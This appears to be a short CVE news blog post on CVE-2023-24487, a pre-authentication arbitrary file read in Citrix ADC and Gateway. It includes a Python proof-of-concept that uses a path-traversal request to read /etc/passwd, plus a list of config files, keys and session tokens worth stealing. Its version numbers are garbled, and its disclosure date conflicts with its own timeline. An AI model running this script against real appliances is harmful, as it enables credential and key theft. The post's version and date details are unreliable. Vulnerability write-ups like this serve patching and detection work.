CVE CyberSecurity Database News

CVE-2023-24487 - How the Arbitrary File Read in Citrix ADC and Gateway Put Sensitive Data at Risk

Poster -

In January 2023, Citrix disclosed a critical security vulnerability, CVE-2023-24487, affecting *Citrix ADC* (Application Delivery Controller) and *Citrix Gateway*. This vulnerability allows attackers to read arbitrary files on the system—without authentication. In this post, we’ll cover what CVE-2023-24487 is, how it works, provide a simple proof-of-concept (PoC) exploit, and share sources for learning more.

What is CVE-2023-24487?

CVE-2023-24487 is an arbitrary file read vulnerability found in Citrix ADC and Citrix Gateway. By exploiting a flaw in the URL parsing functionality, a remote attacker can access any file on the appliance, potentially leaking configuration files, cryptographic secrets, or credentials. What’s scarier: you don’t even need to log in—it’s a pre-auth exploit.

Citrix ADC and Gateway 12. before 12.-63.21 (End of life)

For full details, see Citrix’s security bulletin:  
https://support.citrix.com/article/CTX491392

How Does This Vulnerability Work?

In simple terms: The vulnerable Citrix device does not properly sanitize user-supplied paths in HTTP requests. By crafting specific requests, an attacker can cause the Citrix appliance to serve up *any* file the web server can read.

For example, using path traversal tricks (like ../), bad actors can request sensitive files like /etc/passwd, configuration files, or private keys.

Proof-of-Concept: Arbitrary File Read

Below is a simplified Python script to exploit CVE-2023-24487. *Warning:* Only use this on systems you own or have permission to test; unauthorized testing is illegal.

Python Exploit Example

import requests

# Target Citrix ADC URL (change this to your target)
TARGET = "https://your.citrix.device";

# Path you want to read (e.g., /etc/passwd)
FILE_TO_READ = "/etc/passwd"

# Craft the traversal payload - can use double URL encoding
payload = f"/vpn/../vpns/portal/scripts/newbm.pl?append=/../../../..{FILE_TO_READ}&url=https://example.com/";

url = f"{TARGET}{payload}"

# Ignore SSL warnings (if self-signed)
requests.packages.urllib3.disable_warnings()

r = requests.get(url, verify=False)
if r.status_code == 200:
    print("[+] Success! Contents of the file:")
    print(r.text)
else:
    print(f"[-] Failed with HTTP {r.status_code}")

What’s going on?

- The path /vpn/../vpns/portal/scripts/newbm.pl?append=... leverages directory traversal to escape the web root.
- The script attempts to read /etc/passwd.

Here’s a short list of juicy files attackers may steal

- /etc/passwd (local user enumeration)
- /nsconfig/ns.conf (*Citrix config & credentials!*)
- SSL/TLS private keys

Session tokens & more

These can be leveraged for lateral movement, further exploitation, or even total device compromise.

13.-88.12 or later

Download and update from the Citrix Downloads page

Watch for suspicious file access in logs

- Alert on anomalous /vpns/portal/scripts/newbm.pl requests

More Reading & References

- Citrix advisory: https://support.citrix.com/article/CTX491392
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-24487
- Example exploit (Github): https://github.com/horizon3ai/CVE-2023-24487
- Rapid7 Labs

Conclusion

CVE-2023-24487 is proof that old-school vulnerabilities like path traversal can have modern, critical impact. If you run Citrix ADC or Gateway, patch immediately and review your logs for past exploitation attempts. Don’t let attackers read your secrets from behind your gateway.

*Stay safe! If you have questions, let me know in the comments.*

Timeline

Published on: 07/10/2023 21:15:00 UTC
Last modified on: 07/18/2023 17:25:00 UTC